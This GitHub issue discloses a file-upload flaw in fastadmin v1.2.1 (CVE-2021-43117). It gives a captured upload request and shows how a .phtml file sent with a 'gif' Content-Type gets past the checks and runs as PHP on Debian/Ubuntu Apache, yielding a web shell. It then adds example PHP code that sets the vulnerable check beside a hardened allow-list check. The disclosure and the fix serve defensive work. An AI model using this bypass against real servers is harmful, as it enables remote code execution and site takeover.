CVE-2021-43117: fastadmin v1.2.1 file upload getshell · Issue #1 · ambitiousleader/some-automated-script
fastadmin v1.2.1 is affected by a file upload vulnerability which allows arbitrary code execution through shell access.
Detail:

(attached screenshot: image.png)

```http
POST /fastadmin/public/UCAdNKmOnG.php/ajax/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------261389892721156981001433602982
Content-Length: 23583
Origin: http://localhost
Connection: close
Cookie: Phpstorm-40b5128e=37cc58fa-2924-474e-95a3-1066d7c6bcfd; PHPSESSID=obk19k61dd4jmat3ljhkihr00h; think_var=zh-cn
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------261389892721156981001433602982
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png

\x89PNG\r\n\x1a\n   (8-byte PNG signature; the rest of the binary body is omitted here)
```
`application/common/library/Upload.php` line 312 calls four check methods; analysed one by one:

- `application/common/library/Upload.php#checkSize` (line 120): checks that the uploaded file size is not bigger than the configured default.
- `application/common/library/Upload.php#checkExecutable` (line 82): PHP files and HTML files are not allowed to be uploaded.
- `application/common/library/Upload.php#checkMimetype` (line 91): checks the file type. `$mimetypeArr` is the default value `$mimetypeArr = $this->config['mimetype'] = [jpg,png,bmp,jpeg,gif,zip,rar,xls,xlsx,wav,mp4,mp3,pdf]`, and the file type must be in this array.
- `application/common/library/Upload.php#checkImage` (line 103): checks that the uploaded file is a picture. Because the judgement is a logical OR, the check passes as long as the type value makes `in_array` return true, so we can upload a file with another PHP suffix that can still be parsed, such as php5, phtml, php3 and so on.
Change the Content-Type to `gif` and the filename to `xx.phtml`.

However, phtml could not be parsed. I found that if the CMS is built in a Debian or Ubuntu environment, the attack can succeed. The Debian/Ubuntu apache2 configuration file is written as follows: it automatically includes the `mods-enabled/*.conf` files, which by default parse phtml as php.

So, accessing the shell address completes the attack; this IP is my Debian machine's IP address.
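The following is an added example, not code from fastadmin or from the author of this issue. It models the validation behaviour described in the checkMimetype/checkImage analysis above (a check that passes when either the suffix or the client-supplied Content-Type is in the allow-list) and puts a hardened version beside it, so the `Content-Type: gif` + `xx.phtml` trick can be tried against both. The function and constant names, the `PHP_HANDLER_SUFFIXES` list and the sample cases are assumptions made for this example; only the default allow-list and the php/html block-list come from the issue text.

```php
<?php
// Added example, not fastadmin's own code. Models the upload checks
// described in the issue: a vulnerable OR-style decision beside a
// hardened one. Names below are assumptions chosen for this example.
declare(strict_types=1);

// Default allow-list quoted in the issue ($this->config['mimetype']).
const ALLOWED_SUFFIXES = ['jpg', 'png', 'bmp', 'jpeg', 'gif', 'zip', 'rar',
    'xls', 'xlsx', 'wav', 'mp4', 'mp3', 'pdf'];

// What the issue says checkExecutable rejects: php and html only.
const EXECUTABLE_BLOCKLIST = ['php', 'html'];

// Suffixes that stock Apache + mod_php (Debian/Ubuntu) or common AddHandler
// setups may hand to the PHP interpreter. Assumed list for this example.
const PHP_HANDLER_SUFFIXES = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml',
    'phar', 'phps', 'pht', 'html', 'htm', 'shtml'];

// The two attacker-controlled fields of a multipart part (filename and the
// part's Content-Type), as seen in the request above.
function fileInfo(string $filename, string $contentType): array
{
    $suffix = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return ['name' => $filename, 'suffix' => $suffix, 'type' => strtolower(trim($contentType))];
}

// Vulnerable model: accept if the suffix is allowed OR the declared type is
// allowed. "Content-Type: gif" therefore satisfies it for any suffix that
// the php/html block-list does not catch, e.g. .phtml or .php5.
function vulnerableCheck(array $file): bool
{
    if (in_array($file['suffix'], EXECUTABLE_BLOCKLIST, true)) {
        return false;
    }
    return in_array($file['suffix'], ALLOWED_SUFFIXES, true)
        || in_array($file['type'], ALLOWED_SUFFIXES, true);
}

// Hardened model: the decision rests on the extension alone and the extension
// must be on the allow-list (the declared type can never widen it). Every
// dot-separated extension component is also checked against the handler list,
// so "shell.phtml" and "shell.phtml.png" (AddHandler setups) both fail.
function hardenedCheck(array $file, array $allowedSuffixes = ALLOWED_SUFFIXES): bool
{
    $suffix = $file['suffix'];
    if ($suffix === '' || !in_array($suffix, $allowedSuffixes, true)) {
        return false;
    }
    $parts = explode('.', strtolower($file['name']));
    array_shift($parts); // drop the base name; only extension components matter
    foreach ($parts as $part) {
        if (in_array($part, PHP_HANDLER_SUFFIXES, true)) {
            return false;
        }
    }
    // The declared type is only ever used to tighten the decision, never to
    // loosen it: an image extension must arrive declared as an image/* type.
    $imageSuffixes = ['jpg', 'jpeg', 'png', 'gif', 'bmp'];
    if (in_array($suffix, $imageSuffixes, true) && strpos($file['type'], 'image/') !== 0) {
        return false;
    }
    return true;
}

// Constructed cases; the first is the exact combination used in the issue.
$cases = [
    ['xx.phtml', 'gif'],
    ['xx.php5', 'png'],
    ['shell.phtml.png', 'image/png'],
    ['1.png', 'image/png'],
];
foreach ($cases as [$name, $type]) {
    $f = fileInfo($name, $type);
    printf("%-18s %-10s vulnerable=%-7s hardened=%s\n", $name, $type,
        vulnerableCheck($f) ? 'ACCEPT' : 'reject',
        hardenedCheck($f) ? 'ACCEPT' : 'reject');
}
```

Run it with `php example.php`; the first three cases pass the vulnerable check and fail the hardened one, and only `1.png` passes both. The reason the extension is the decisive control is the server-side mapping the issue points at: on Debian and Ubuntu the packaged mod_php configuration under `mods-enabled/` maps `.php`, `.phar` and `.phtml` to the PHP handler with a `FilesMatch` rule, so a block-list that knows only about `php` and `html` is incomplete by construction. An extension allow-list, checked independently of the client's Content-Type, plus storing uploads where no script handler applies, is the fix.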